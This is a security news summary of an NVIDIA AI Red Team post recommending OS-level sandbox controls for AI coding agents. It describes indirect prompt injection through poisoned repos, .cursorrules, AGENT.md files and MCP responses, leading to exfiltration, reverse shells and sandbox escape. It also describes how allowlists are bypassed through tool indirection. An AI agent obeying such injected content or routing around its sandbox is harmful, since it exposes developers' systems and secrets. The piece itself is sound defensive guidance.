NVIDIA AI Red Team — Mandatory sandbox controls for agentic coding workflows

2026-02-03 Security by al-ice.ai Editorial

AI relevance: AI coding agents (Codex, Claude Code, Cursor) run arbitrary code with the developer's full permissions — NVIDIA's AI Red Team now publishes the minimum OS-level controls needed to prevent prompt-injection-to-RCE chains in these tools.

NVIDIA's AI Red Team released a detailed post outlining mandatory and recommended sandbox controls for agentic coding tools — the first vendor-backed prescriptive guidance at this level of specificity.
The primary threat: indirect prompt injection via malicious repos, pull requests, git histories, .cursorrules, CLAUDE.md/AGENT.md files, or poisoned MCP server responses. Once the LLM ingests attacker-controlled content, it can be steered to execute harmful commands.
Three mandatory controls: (1) block network egress to arbitrary hosts (prevents data exfiltration and reverse shells), (2) block file writes outside the workspace (prevents persistence and sandbox escape), (3) block writes to configuration files anywhere (prevents hook, skill, and local MCP config exploitation).
Application-level controls are insufficient. Once the agent spawns a subprocess, the application has no visibility. Attackers use indirection — calling a restricted tool through an approved one — to bypass allowlists. OS-level sandboxing (macOS Seatbelt, seccomp, etc.) is needed.
Recommended additional controls: prevent reads outside workspace, sandbox the entire IDE and all spawned processes (hooks, MCP startup scripts, skills), use microVM/Kata for kernel isolation, require per-instance approval for network connections, inject secrets separately so the agent never sees them.
The guidance explicitly warns against "allow-once / run-many" approval patterns — each action instance needs its own approval to prevent exploitation chains.
Manual approval alone is fragile due to user habituation — developers routinely rubber-stamp agent actions, creating an exploitable trust gap.

Why it matters

This is the first time a major hardware/AI vendor's red team has published concrete, implementable sandboxing requirements for AI coding agents. It raises the bar from "be careful" to "here are the specific syscall-level controls."
The attack vectors listed (poisoned .cursorrules, AGENT.md, MCP configs) are already being exploited in the wild. This isn't theoretical.
As agentic coding tools become default in enterprise dev workflows, the gap between "full user permissions" and "sandbox isolation" is where breaches will happen.

What to do

Implement all three mandatory controls (network egress, workspace-only writes, config file protection) for any agentic coding tool in your org.
Use OS-level sandboxing (containers, microVMs, Seatbelt profiles) rather than relying on the agent application's own allowlists.
Audit your agent configs: review .cursorrules, AGENT.md, and local MCP server definitions in every cloned repo — they are injection vectors.
Separate secrets from the agent environment: don't let API keys, SSH keys, or tokens be readable by the sandboxed process.

NVIDIA AI Red Team — Mandatory sandbox controls for agentic coding workflows

Why it matters

What to do

Sources